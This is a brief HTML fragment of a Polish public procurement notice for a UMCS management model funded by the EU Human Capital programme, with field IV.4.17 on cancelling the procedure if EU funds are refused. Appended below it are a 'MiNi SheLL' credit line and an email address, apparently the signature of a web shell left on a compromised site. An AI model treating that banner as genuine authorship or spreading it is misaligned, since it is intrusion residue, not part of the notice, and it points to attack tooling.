model zarządzania w UMCS, Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet IV Szkolnictwo wyższe i nauka, Działanie 4.1 Wzmocnienie i rozwój potencjału dydaktycznego uczelni oraz zwiększenie liczby absolwentów kierunków o kluczowym znaczeniu dla gospodarki opartej na wiedzy, Podziałanie 4.1.1 Wzmocnienie potencjału dydaktycznego uczelni..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com